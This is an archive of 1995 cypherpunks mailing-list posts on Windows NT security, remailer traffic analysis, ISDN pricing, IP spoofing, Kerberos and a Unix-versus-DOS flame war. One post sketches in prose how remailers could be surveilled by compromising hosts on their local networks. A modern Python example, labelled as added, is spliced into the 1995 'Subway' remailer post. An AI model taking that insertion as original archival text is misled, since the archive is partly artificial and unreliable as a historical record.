L+ 3 C+ V+ P? E- N++ K- W W--- M++ V-- po- Y+++ t:[tos+, tng--, ds9+] 5 !j
!R G? tv+ b+++ D+ B--- e+(- | *) u--- h+++ f+(++) r++ n+(---) x**(++)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 12:28:25 PST
To: cypherpunks@toad.com
Subject: Re: An article on Windows (in)security
In-Reply-To: <9501261717.AA08133@sulphur.osf.org>
Message-ID: <199501262029.PAA07089@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> >  Windows NT must evolve quickly to garner a spot in the secure operating
> >system arsenal or somehow steal market share from the likes of Novell. It
> >just is not there yet. But Microsoft's Phaup left me with one closing
> >thought. ``Have you talked to the Cairo [Windows 95.5] guys yet?''
> >
> >  Schwartau is an independent consultant, writer and lecturer on network
> >security topics. He can be reached at Interpact, Inc. at (813) 393-6600, or
> >via electronic mail at P00506@psilink.com.

FYI, there's been some controversy lately on the Firewalls list about Winn
Schwartau. For one thing, he apparently works as a marketer for the company
that makes the Sidewinder firewall, so this "independent consultant" bit has
been judged rather misleading by some people. Last I saw, someone was 
requesting an apology/explanation from Internet World or some such magazine
for the last paragraph above, or a reasonable facsimile.
This arose because he apparently wrote a highly favorable review of Sidewinder
for the aforementioned `zine, in which he also criticized Bellovin & Cheswick's
firewalls bible for not discussing "type enforcement" (used/implemented by 
Sidewinder).  The latter criticism has been vigorously defended by some third
parties, and I don't know enough about the subject to make any clear judgement
about it. Anyway, since he's knocking the security of something else in the
article here, I thought it appropriate to point all this out.

[Lest anyone ask me, you can join the firewalls list by sending mail to
 majordomo@greatcircle.com with "subscribe firewalls" in the body, not in the
 subject. There's a digest format (use "subscribe firewalls-digest") which I
 recommend over the standard list distribution.]

 -L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher E Stefan <flatline@u.washington.edu>
Date: Thu, 26 Jan 95 15:41:39 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: The Remailer Crisis
In-Reply-To: <199501241501.HAA21364@largo.remailer.net>
Message-ID: <Pine.A32.3.91c.950126152907.79370E-100000@mead2.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Eric Hughes wrote:

>    From: root <root@einstein.ssz.com>
> 
>    Exactly how does this work at your location Eric? Here in Southwestern Bell
>    we don't use the D except for call initiation and termination. There is no
>    usage tariff other than this. 
> 
> The standard residential tariff here in Pac Bell is flat rate during
> non-business hours and per-minute during them.

Most LEC's charge per-minute for ISDN.  Pac Bell and SWBT are some of the 
few exceptions.  What's even worse is in some states there isn't even a 
residential ISDN tariff, hence all ISDN lines are "business" lines and 
billed accordingly.  The only real solution is to demand dial the 
connection from both ends.  This is fairly straightforward assuming your 
provider is set up for it, since there is a lot of ISDN equipment that 
will bring the connection up only when there are packets to send then 
idle it out.

An economical alternative in some areas is frame-relay.  In Washington 
state USwest wants ~$70/month for a 56k FR link to anywhere in your 
LATA.  The providers around here charge $100-$150 to link a single 
machine to the net via FR, and $150-$350 if you are routing a whole 
subnet.

-- 
Christopher E Stefan  *  flatline@u.washington.edu  *  PGP 2.6ui key by request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 26 Jan 95 15:48:07 PST
To: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
Message-ID: <199501262347.AA24792@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Andrew Lowenstern asks:

> Is this even technically possible?  That is, wholesale monitoring of  
> disparate portions of the net from a single access point.  Given the  
> distributed and dynamic properties of the Net this would seem impossible.  To  
> monitor the entire remailer network an attacker would have to set up packet  
> sniffers upstream from each and every portion of the Net that contained a  
> remailer, wouldn't they?

Given the current state of computer security, this should 
not be too difficult for an organization such as NSA.  For 
each remailer, just hack into a computer on its local 
ethernet and put it into promiscuous mode.  Each time an 
e-mail passes by, have it send the header to some monitoring 
center using a UDP packet.

> I suppose an extremely resourceful attacker could monitor traffic at crucial  
> points (i.e. transcontinental feeds, points on the NSFnet, CIX, etc...), but  
> there are so many private connections linking networks that it would be very  
> difficult indeed to sniff out every bit of remailer traffic.  Is having every  
> bit of remailer traffic necessary for traffic analysis?  Or would having a  
> good percentage of it be sufficient?

Complete monitoring should not be necessary, having a 
larger percentage of the traffic just makes the job easier.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLygz8jl0sXKgdnV5AQFv3wP/USeKOwPBn12m1hC9RPOgwi1Zt4wB+T5J
RWM3fYAvpK4gGUB2xOGrSLDh68DNDgSghjwqacBTkEsn+5ENBXd9rrQOjmaMeipI
rJuxYSJTiNKhlGro3yY2UW3FScKYks3mi6eJ9G+g5rOOIHqCKtAhkSQJkHeCJOM3
3m2ObHv1gMs=
=xmaK
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> Big Bang --> atoms --> complex macromolecules --> biological evolution
--> central nervous systems --> social learning --> symbolic communication
--> computers --> internetworking --> close-coupled automation
--> high-bandwidth brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Thu, 26 Jan 95 14:13:45 PST
To: cypherpunks@toad.com
Subject: "Subway" remailers
Message-ID: <9501262213.AA23510@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Need ideas/comments:

I have been modeling remailer scenarios using IBM VM/ESA virtual
machines. After fwaffing a bit, looking at the traffic analysis
concern, and taking note of some of the probability work posted
recently, I thought I might throw this idea out for a sanity check:

"Subway" remailers.

"Subway" remailers would exchange identical sized "containers", much
like a subway at semi-regular pulses or intervals. It would require
a ring of remailers large enough (yeah, I know) to make traffic analysis
of entrance and exit points difficult and/or expensive.

Each container would contain either fixed or variable slots for
multiple messages. Containers could be full, partially full, or
even empty. (there would probably have to be a max message size)

Subway remailers would be able to carry a message to a designated
"last" remailer or to deliver blindly to a "last" remailer of
random choosing.

Messages may or may not change containers at the various
stations/remailers. It could be randomized.

Possible header scripts:

X-Subway-Script: Ride 2; Latent: 03:30; Ride 3; Deliver;

or many other possibilities.

The whole container would be encrypted to the next remailer,
giving the next remailer the same access to exchange passengers
or to make them wait in a latent state.

The quirkier matters on this are how to handle PGP so that
nothing is compromised and how the remailers are to identify
each other as "friendly and operational" so the subway system
does not have a traffic jam.

Crypto comments please.

------------------------------------------------------------------
P M Dierking |
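
The container format and header script proposed in the post above, as an added Python example that is not part of the original message or of any deployed remailer. The slot size, slot count, length-prefix layout and the reading of `Latent: 03:30` as hours:minutes are assumptions; encrypting the container to the next remailer, which the post calls for, is left out.

```python
import os
import random
import re
import struct

# Assumed parameters; the post only says slots and a maximum message size exist.
SLOT_SIZE = 1024                      # bytes per slot, including length prefix
SLOTS = 8                             # slots per container
LEN_PREFIX = struct.Struct(">H")      # 0 marks an empty slot
MAX_MESSAGE = SLOT_SIZE - LEN_PREFIX.size
CONTAINER_SIZE = SLOT_SIZE * SLOTS

_STEP = re.compile(
    r"^(Ride)\s+(\d+)$|^(Latent):\s*(\d{1,2}):(\d{2})$|^(Deliver)$", re.I)


def parse_script(header_line):
    """Parse 'X-Subway-Script: Ride 2; Latent: 03:30; ...' into a step list."""
    name, _, value = header_line.partition(":")
    if name.strip().lower() != "x-subway-script":
        raise ValueError("not an X-Subway-Script header")
    steps = []
    for raw in value.split(";"):
        token = raw.strip()
        if not token:
            continue
        m = _STEP.match(token)
        if not m:
            raise ValueError(f"unrecognised step: {token!r}")
        if m.group(1):
            hops = int(m.group(2))
            if hops < 1:
                raise ValueError("Ride needs at least one hop")
            steps.append(("ride", hops))
        elif m.group(3):
            # Assumption: hh:mm, stored as minutes.
            steps.append(("latent", int(m.group(4)) * 60 + int(m.group(5))))
        else:
            steps.append(("deliver", None))
    if not steps:
        raise ValueError("empty script")
    return steps


def next_hop(steps):
    """Consume one station's worth of script: (action, arg, remaining steps)."""
    if not steps:
        raise ValueError("empty script")
    (kind, arg), rest = steps[0], list(steps[1:])
    if kind == "ride":
        if arg > 1:
            rest.insert(0, ("ride", arg - 1))
        return "forward", None, rest
    if kind == "latent":
        return "hold", arg, rest
    return "deliver", None, rest


def pack_container(messages):
    """Build a container whose length never depends on how full it is."""
    if len(messages) > SLOTS:
        raise ValueError("too many passengers for one container")
    slots = []
    for msg in messages:
        if not 0 < len(msg) <= MAX_MESSAGE:
            raise ValueError("message empty or over the maximum size")
        pad = os.urandom(MAX_MESSAGE - len(msg))
        slots.append(LEN_PREFIX.pack(len(msg)) + msg + pad)
    while len(slots) < SLOTS:
        slots.append(LEN_PREFIX.pack(0) + os.urandom(MAX_MESSAGE))
    # Slot position carries no meaning, so arrival order is not preserved.
    random.SystemRandom().shuffle(slots)
    # The length prefixes are readable here; only encryption to the next
    # remailer (not shown) hides which slots are occupied.
    return b"".join(slots)


def unpack_container(blob):
    """Return the messages carried in a container, ignoring empty slots."""
    if len(blob) != CONTAINER_SIZE:
        raise ValueError("container has the wrong size")
    out = []
    for off in range(0, CONTAINER_SIZE, SLOT_SIZE):
        (n,) = LEN_PREFIX.unpack_from(blob, off)
        if n > MAX_MESSAGE:
            raise ValueError("corrupt slot length")
        if n:
            start = off + LEN_PREFIX.size
            out.append(blob[start:start + n])
    return out
```
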




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Thu, 26 Jan 95 13:39:44 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: CERT statement
Message-ID: <9501262142.AA07376@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


>> What we need to concentrate on is secure systems that are not vulnerable 
>> to IP spoofing, as opposed to firewalls.

You're exactly right.  However, getting people to deploy real security
systems is nearly impossible.  My company sells a kerberos system, and
although everyone is saying they want security, nobody really
understands what this means, and as soon as we tell them that it
actually involves effort, they become far less interested.  Even
though I've seen companies get hosed because of lame security, the
people who matter aren't willing to commit.

I'm hoping that as firewalls begin to fall, that the CERT will stop
recommending half-assed solutions.  We'll have to wait and see.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Thu, 26 Jan 95 14:04:43 PST
To: cypherpunks@toad.com
Subject: Re: anonymous IRC access....
In-Reply-To: <199501250211.VAA11047@blue.seas.upenn.edu>
Message-ID: <8j_1jdy00VIE07sYB8@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu> wrote:

> Is there any way to get anon irc access?  there used to be a way to
> get it a couple of years ago but I can't find any ways to do it now....

ftp myriad.pc.cc.cmu.edu /pub/unix/misc/anonirc*

Of course, you need to find someone willing to install that on their site....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill O'Hanlon <wmo@digibd.com>
Date: Thu, 26 Jan 95 15:58:49 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501262358.AA16253@poe.digibd.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Jan 1995 14:43:39 -0800 (PST)  "James A. Donald" wrote:
--------
> On Thu, 26 Jan 1995, Perry E. Metzger wrote:
> > Unix is perfectly easy to use. It's no worse than DOS.
> 
> Thanks for the entertainment Perry.
> 

(I'm assuming you're being sarcastic.)

I had agreed with Perry's statement when I saw it.  I've taught classes in both
DOS and UNIX.  Whenever I've taught people who knew next to nothing about
computers, I found people were able to attain a basic "user" sort of skill
level in about the same amount of time with about the same difficulty when 
learning either.

If you're going to be snotty and sarcastic, the least you could do is provide
a counter-example, to give us something to discuss.  After you showed your
heinie (IMHO) in your comments about operating system security the other day,
I'd think you'd have lost credibility to gain.  I mean, I was tempted to
make a comment to you much like the one you made to Perry, but I didn't think
it was worth the time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 26 Jan 95 16:13:22 PST
To: flatline@u.washington.edu (Christopher E Stefan)
Subject: Re: The Remailer Crisis
In-Reply-To: <Pine.A32.3.91c.950126152907.79370E-100000@mead2.u.washington.edu>
Message-ID: <199501270002.SAA00862@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> Most LEC's charge per-minute for ISDN.  Pac Bell and SWBT are some of the 
> few exceptions.  What's even worse is in some states there isn't even a 
> residential ISDN tariff, hence all ISDN lines are "business" lines and 
> billed accordingly.  The only real solution is to demand dial the 
> connection from both ends.  This is fairly straightforward assuming your 
> provider is set up for it, since there is a lot of ISDN equipment that 
> will bring the connection up only when there are packets to send then 
> idle it out.
>
Here in SWB territory there are residential and business rates for ISDN.
 
> An economical alternative in some areas is frame-relay.  In Washington 
> state USwest wants ~$70/month for a 56k FR link to anywhere in your 
> LATA.  The providers around here charge $100-$150 to link a single 
> machine to the net via FR, and $150-$350 if you are routing a whole 
> subnet.
>
Be sure to multiply these costs by 2 since a single 56k is approx. half of
2 B's that have been bonded. I specifically looked for a provider who didn't
charge according to how many machines I have on the other end. I am buying
the ability to send a certain amount of bits over a wire in a certain amount
of time. Whether those bits come from 1 or 100 machines is irrelevant.

I would have no problem w/ interNIC charging for registering IP's (which I
hear may happen sooner than we realize) since I got a full 'C' when I set up.
We already use 23 of the addresses and will be looking at adding at least a
couple of more in the near future.

In the case of the CombiNet 160 the choice of 'idle-out' or 'tear-down' is
one of software. The codec is programmed via a serial line (which the dox say
can be hooked to a modem, as if anyone was that stupid) port and has its own 
little menu system. I keep both my B's running all the time.

Take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew K Bressen <bressen@cs.columbia.edu>
Date: Thu, 26 Jan 95 15:18:38 PST
To: cypherpunks@toad.com
Subject: Re: Win NT security
Message-ID: <199501262314.SAA26672@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>  Kevin Phaup, program manager lead of Microsoft's Business Systems
>>Division, put the best spin he could on this first major Windows NT
>>shortcoming. ``Pull the data into a database and then massage it,'' he said.
>>``We have a new product - System Management Server from the Back Office
>>Suite - that could help.''
>>  I agree, but why would I want to buy a brand-new operating system that
>>needs help out of the box?

Because there aren't any that do not.
OS/2 1.x and 2.x had no performance monitoring tools, Windows 3.1 and
3.11 didn't initially come with TCP/IP, Mac owners for the longest
time had to buy suitcase and still buy ramdoubler, VMS doesn't support
RAID out of the box... systems and utility software has been with us
for a long time, and will be for a while yet. 

At one facility where I work (an NYC brokerage) we run at least 200
users each on ultrix, VMS, NT 3.5, WFW 3.11, Windows 3.1, and VM/CMS,
and have about ten OS/2 1.3 servers as well. NT users require less
help with networking than dos users, more than unix users.  Backup is
easier with NT than dos, but harder than VMS.  RAID is easier than
with VMS or unix, but multiple redundantly clustered systems aren't
available for NT. Systems management is slightly harder than VMS or
unix, but much easier than WFW. NT crashes more than VM/CMS, but less
than ultrix 4.2 did and much less than dos windows does.

>>  What's more, the third-party database solution for security administration
>>is a hopeless short-term patch. To be truly effective, it needs a much
>>tighter integration with Windows NT's APIs to permit not only systemic
>>analysis, but also systemic security changes based on selected criteria.

huh? you just specced out what it needs to work; I don't see why this
would be a problem for symantec or some similar firm to deliver. The
API is published and fairly stable, NT users just have to wait for
someone to actually do it.

>>  If administrators want to change the access rights of every user so they
>>can log on at 7 a.m. instead of 8 a.m., they cannot do it with Windows NT
>>3.5. They might be able to do it with a third-party product or with Windows
>>NT 4.0.

they can't do it with unix either without coding some, and with dos
windows you can just forget about it. 

>>  ``If someone builds an administration product like that, they'll make a
>>lot of money,'' Phaup says.

yep. so what makes you say that it is "hopeless"?

>>  A  WEEKEND'S  WORK  Windows NT has other security problems, as well. For
>>example, it does not have data cryptography, which is essential to make sure
>>a network is reasonably secure from eavesdropping and integrity breaches.

um, what OS does, out of the box? especially in a 1.5 release...
heck, I'm not aware of any networkable OS that has end-to-end link and
application level encryption, file acl's, and a key management scheme
that can be both centrally and distributedly administered. Kerberos
and AFS both make a start in these directions, but are not there yet.

>>Microsoft, which knows encryption technology, easily could have included the
>>appropriate algorithms in software to make Windows NT more secure.

please to define easily? the NT 3.5 release slipped enough as it was.

>>  Microsoft's Phaup agrees it would have been simple to add encryption to
>>Windows NT. ``The hooks are all there,'' he said.

so are the hooks for UFS support, and for WINS-DNS integration. the os
has more hooks than a football field covered in velcro. so what?

>>  But Windows NT does not need cryptography for C2 certification. And
>>perhaps even more telling, Microsoft cannot export cryptography outside the
>>U.S. due to export control laws that prohibit it from doing so without
>>licensing. Of course, the company could have made two versions of Windows
>>NT: one with cryptography for domestic use and one without cryptography for
>>export.
>>
>>  According to Phaup, Microsoft was reluctant to do so for two reasons.
>>``Security is way down on the list of corporate concerns and desires and
>>wants in an OS. It's in the top 20, but not the top 3,'' he says. ``And the
>>testing cycle would have been a double killer.''

summary: consumers aren't demanding security and it would cost time
and money to put it in, so we didn't make it a priority, but we did
leave hooks for it. so why are you vilifying them? overall, this
sounds pretty reasonable.

>>  Windows NT's last major shortcoming lies in the omission of a feature that
>>most security experts consider virtually indispensable: boot control.

um, which security experts would these be? I sure don't consider the
absence of boot control on my 400 VMS and unix workstations to be much
of a concern...

>>  In the DOS/Windows world, third-party PC security is reasonably attempted
>>by forcing users to boot from the C drive and making them log on with IDs
>>and passwords. 

And NT does this.

>>... However, if a bootable DOS diskette is inserted in the A 
>>drive, the PC will boot without a logon, and the A:> will appear.
>>
>>  But if the user attempts to log over to the C drive, the system will come
>>back with a message such as: Invalid drive specification. Security experts
>>recognize this as an inexpensive technique that will keep out casual
>>intruders and nontechnical types.

Well, booting off of a DOS diskette in drive A sure won't let you at
my NTFS C: drive... though I'm not sure how technical an intruder
would have to be to find the user's password written down somewhere on
their desk, or to try their initials or first name...

>>  One way to mandate boot control is with a hardware or firmware addition to
>>the PC in the form of an add-on card. 

Or a key lock on the power supply or a password lock in the CMOS of the
machine, both of which are available from several major hardware
vendors, and neither of which cares if the machine is dos, nt, unix,
or pick.

>>  In Windows NT, boot control does not even exist as an option. 

Huh? The key lock on my DEC PC works just fine, and the CMOS lock on
the compaqs here doesn't care what the OS is...

>>... Again, this
>>suggests that Microsoft's security effort was driven by C2 certification,
>>not by security itself.

OK, the federal government spends millions of dollars coming up with a
security spec for computers that they buy. Microsoft wants to sell
the fed NT, so they make sure NT can pass the spec. I fail to see the
shortcoming on their part. Out of the box NT is more secure than DOS, Windows,
Windows for Workgroups, and most flavors of unix more than two years
old. A well administered group of NT machines can be more secure than a
poorly administered group of VMS, Novell, or unix systems.

It is not the most secure OS ever devised. It sure isn't B2. This
doesn't strike me as unreasonable, though we could wish for better.

>>  Windows NT must evolve quickly to garner a spot in the secure operating
>>system arsenal or somehow steal market share from the likes of Novell. It

How is Novell more secure or securable than NT?
Comparing an OS to a networking system, strikes me as unproductive;
people run Novell on servers, not desktops. NT can run a 32 bit API on
several 64 bit flavors of hardware, it is multitasking and
multithreaded... comparing it to Novell is apples and oranges.

If you're comparing Novell+DOS (or DOS/Windows) to NT, then right out
of the box, your above statements seem reversed: if the data is on the
desktop, and the PC doesn't have extra security hardware, then I can
floppy boot the pc and get the data, but I'll need a username and
password to get into the NT system. If the data is on the server, then
under either system I'll need a username and password. Neither one
will stop me from taking the hard drive and sticking into a machine I
have control of and getting the data. 

- --a. k. bressen
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLygs0yoZzwIn1bdtAQG/YQF9EpEzsvQvEDdBnoROxlgAUK0YMrFTR35b
FvT1uqcLEqfCo65qJ2qpSmX0SC+Hin5u
=eTTq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 26 Jan 95 16:41:13 PST
To: Andrew K Bressen <bressen@cs.columbia.edu>
Subject: Re: Win NT security
Message-ID: <9501270039.AA07184@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  How is Novell more secure or securable than NT? Comparing an OS to
>  a networking system, strikes me as unproductive; people run Novell
>  on servers, not desktops. NT can run a 32 bit API on several 64
>  bit flavors of hardware, it is multitasking and multithreaded...
>  comparing it to Novell is apples and oranges.

actually, NetWare has a 32-bit API, runs on 64-bit hardware (maybe, they have  
a SPARC version and may have a PA version, but I haven't kept up), is  
multitasking and multithreaded.  Most people don't think of NetWare as a Real  
OS(*tm), but it is QUITE robust.  You could put it on someone's desk, but it  
doesn't run windows.  The main reason it's primarily a server OS is because  
Novell markets it that way.

What is really cool about NetWare that has more cypherpunks relevance than  
most of this thread is that it has built-in support for single point network  
logins via RSA authenticated certificates (the initial password exchange is  
encrypted with RSA as well).  This has been a feature for about 2 years now  
and is, as far as I know, the only major operating system that has native  
support (at all levels of the OS - not a Unix with kerberos thrown in) for  
such a thing out of the box.  NetWare has a much more sophisticated security  
system than any Unix I've seen or heard about.

My only complaint against Novell here is they think details about the  
security system are a big secret (such as RSA key lengths and the specific  
PRNG and hashing algorithms used).  Pretty typical corporate mentality at  
work...  While they may use RSA, it is my understanding that Novell in the  
past has used weak home-grown hashing and encryption algorithms for password  
storage.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 15:53:05 PST
To: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <9501261922.AA07092@ch1d157nwk>
Message-ID: <9501262352.AA17798@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Lowenstern says:
> Is this even technically possible?  That is, wholesale monitoring of  
> disparate portions of the net from a single access point.

Sure -- you need to have packet forwarders installed all over the
place, but that's easy to do -- there are commercial network monitoring
products that will do the job for you. In that sense, you can't do it
from a single access point.

> To monitor the entire remailer network an attacker would have to
> setup packet sniffers upstream from each and every portion of the
> Net that contained a remailer, wouldn't they?

Largely, although they could be smart about how they did it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 15:55:08 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: CERT statement
In-Reply-To: <Pine.SUN.3.91.950126142119.21338C-100000@thrash.src.umd.edu>
Message-ID: <9501262354.AA17806@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> Is it my imagination, or is CERT just trying to firewall up the internet 
> into uselessness?

No, they are trying to protect people. I'm about the biggest critic of
CERT out there, but I don't disagree with what they said -- although
it's insufficient.

> What we need to concentrate on is secure systems that are not vulnerable 
> to IP spoofing, as opposed to firewalls.

The only way to do that is cryptographic security. See draft-metzger-*
in the nearest internet drafts repository.

> But of course, more firewalls makes more free transfer of information 
> across the internet more difficult.

No they don't. I'm talking across one right now. I barely if ever
notice it.

> perhaps this is what the government is interested in reducing.

Please confine the paranoia to places where it is justified. Firewalls
are a good and important thing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 16:07:07 PST
To: Marc Horowitz <marc@cam.ov.com>
Subject: Re: CERT statement
In-Reply-To: <9501262142.AA07376@dun-dun-noodles.cam.ov.com>
Message-ID: <9501270006.AA17831@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Marc Horowitz says:
> You're exactly right.  However, getting people to deploy real security
> systems is nearly impossible.  My company sells a kerberos system, and
> although everyone is saying they want security, nobody really
> understands what this means, and as soon as we tell them that it
> actually involves effort, they become far less interested.

Kerberos per se isn't sufficient to defend against session hijacking
attacks, you know. The situation in question is really insidious and
requires packet-by-packet cryptographic authentication.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 16:11:14 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <Pine.3.89.9501261422.A26742-0100000@netcom10>
Message-ID: <9501270010.AA17843@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> On Thu, 26 Jan 1995, Perry E. Metzger wrote:
> > Unix is perfectly easy to use. It's no worse than DOS.
> 
> Thanks for the entertainment Perry.

I see that you have no arguments against my statement...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Thu, 26 Jan 95 16:09:05 PST
To: perry@imsi.com
Subject: Re: CERT statement
In-Reply-To: <9501270006.AA17831@snark.imsi.com>
Message-ID: <9501270011.AA07672@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Kerberos per se isn't sufficient to defend against session hijacking
>> attacks, you know. The situation in question is really insidious and
>> requires packet-by-packet cryptographic authentication.

No, but kerberos or something like it is necessary.  And I think I can
safely say that anything which really defends against TCP sequence
spoofing or hijacking attacks will be more invasive and require more
effort than kerberos, not less.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 26 Jan 95 16:14:33 PST
To: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: pgp content type RFC
In-Reply-To: <9501262055.AA07113@ch1d157nwk>
Message-ID: <9501270014.AA01032@squeamish-ossifrage.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

> Could someone please provide me with the number of the MIME PGP
> content-type RFC?

First, there are no RFCs on this, only Internet Drafts.  The PGP-MIME
I-D has been deprecated, it expired and the authors wish to retract
it.  I suspect there will be a new one which utilizes the PEM Security
Multiparts in MIME spec.

There is also a PGP message format I-D, which documents the PGP packet
structure.  This is available from your favorite I-D location, such
as:
	ftp://ds.internic.net/internet-drafts/*pgp*

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@informix.com (James Donald)
Date: Thu, 26 Jan 95 19:14:42 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501270314.AA01417@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> > > Unix is perfectly easy to use. It's no worse than DOS.
 
"James A. Donald" says:
> > Thanks for the entertainment Perry.

Perry E. Metzger wrote:
> I see that you have no arguments against my statement...

I made no arguments because 

A:  This is not the proper place for such arguments.

B:  The statement is so flagrantly silly that the
proper response is ridicule, not an answer.


Bill O'Hanlon wrote:
> If you're going to be snotty and sarcastic, the least you
> could do is provide a counter-example, to give us something
> to discuss.

[Childish insults, abuse, and flame bait deleted]

Well I did not post examples because other people had been
ridiculing unix for me, (but they were too subtle for you to
understand), and also because this is not the proper place for
such examples.  But since you guys insist:

Long flame on unix follows.  Note that although this flame
has nothing to do with cypherpunks, in it I am discussing unix,
not the character and mental abilities of the people I am
replying to, unlike the usual posts from Perry and Bill.

Flame on:


Perry E. Metzger wrote:
> > > Unix is perfectly easy to use. It's no worse than DOS.

Bill O'Hanlon wrote:
> I had agreed with Perry's statement when I saw it.  I've
> taught classes in both DOS and UNIX.  Whenever I've taught
> people who knew next to nothing about computers, I found
> people were able to attain a basic "user" sort of skill
> level in about the same amount of time with about the same
> difficulty when learning either.

Perry's statement and yours is true but irrelevant.

Why is it that for so long people lived with a make
utility that treated tabs differently to blanks?  "Hey! 
My makefile has mysteriously stopped working!"

Why is it that scientists still publish in latex?

Why is it that so many people are STILL using vi in unix?

Because, unless you wish to live in EMACS, it is too hard
to get your local unix deities to set stuff up so that you
never have to see the accursed vi.

If MIS sets up a decent word processor for the secretaries
in UNIX or Windows, then the secretaries can do moron work
just as easily in either system.  In that sense Perry and
Bill are perfectly correct.

But Unix needs that MIS support to set up the decent word
processor and Windows does not.

Why do you think all the scientists are publishing their
stuff in latex?  Do you propose to teach the secretaries
latex?

Any fool can set up a home network using Windows for
Workgroups.

I certainly could not set up a home network using Unix,
and I doubt that you could either.

You probably could do it eventually, but you would spend
weeks futzing with the system, you would visit other unix
gurus and consult with them, carefully study manuals, copy
other peoples configuration files and futz with them, etc.

My kid could probably set up windows for workgroups, share
the disks and the printer etc, in half an hour, even if he
had never seen a PC network before.  (Though I would have
to install the ethernet cards myself.)

A few weeks ago MIS replaced everyone's Sparc 10s with
Sparcstation 20s.

It was days before we were functioning again, and for a
time I was practically living in my local unix guru's cube.

Unix requires a vast sea of arcane obscure knowledge
to do all kinds of trivial and routine things.  Using unix
makes everyone dependent on a bunch of gurus in a way that
does not happen in DOS.  Yes unix can be set up to be
great, but it usually is not, and the reason it is not is
that IT IS USUALLY TOO HARD EVEN FOR GURUS to do it.

(Which is why scientific papers are published using latex.)

And when it is finally set up that way, you can only do
those things that MIS envisaged you to do, cause if you do
what you want to do then the whole damn house of cards
comes tumbling down around your ears.

For example I have Sun's half assed GUI, which has an
almost tolerable editor, similar to Microsoft's basic
